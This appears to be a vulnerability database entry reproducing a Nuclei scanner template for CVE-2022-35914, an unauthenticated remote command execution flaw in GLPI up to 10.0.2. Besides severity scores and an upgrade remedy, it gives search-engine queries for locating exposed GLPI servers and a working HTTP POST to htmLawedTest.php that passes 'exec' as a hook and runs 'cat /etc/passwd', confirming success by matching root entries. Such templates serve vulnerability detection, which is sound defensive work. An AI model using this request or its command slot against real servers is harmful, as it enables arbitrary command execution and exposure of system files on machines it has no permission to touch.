GLPI <=10.0.2 - Remote Command Execution

2022-10-0312:12:47

ProjectDiscovery

github.com

cve

cve2022

glpi

rce

kev

glpi-project

htmlawed

command execution

upgrade

vendor

severity

critical

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.7 High

AI Score

Confidence

High

0.974 High

EPSS

Percentile

99.9%

JSON

GLPI through 10.0.2 is susceptible to remote command execution injection in /vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module.

id: CVE-2022-35914

info:
  name: GLPI <=10.0.2 - Remote Command Execution
  author: For3stCo1d
  severity: critical
  description: |
    GLPI through 10.0.2 is susceptible to remote command execution injection in /vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the target system.
  remediation: |
    Upgrade GLPI to a version higher than 10.0.2 to mitigate this vulnerability.
  reference:
    - https://mayfly277.github.io/posts/GLPI-htmlawed-CVE-2022-35914
    - https://github.com/cosad3s/CVE-2022-35914-poc
    - http://www.bioinformatics.org/phplabware/sourceer/sourceer.php?&Sfs=htmLawedTest.php&Sl=.%2Finternal_utilities%2FhtmLawed
    - https://nvd.nist.gov/vuln/detail/CVE-2022-35914
    - https://github.com/glpi-project/glpi/releases
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-35914
    cwe-id: CWE-74
    epss-score: 0.97399
    epss-percentile: 0.99914
    cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: glpi-project
    product: glpi
    shodan-query:
      - http.favicon.hash:"-1474875778"
      - http.title:"glpi"
    fofa-query:
      - icon_hash="-1474875778"
      - title="glpi"
    google-query: intitle:"glpi"
  tags: cve,cve2022,glpi,rce,kev,glpi-project
variables:
  cmd: "cat+/etc/passwd"

http:
  - raw:
      - |
        POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: sid=foo

        sid=foo&hhook=exec&text={{cmd}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a00463044022031f4721d255682854c1f6e4bd4388e92d46d517fab31f98380587eb1a48affb80220778ad6d9444db683bd4d83ff14f1b4c8bdd98b8a158995518fb94c3fe5cc4a19:922c64590222798bb761d5b6d8e72950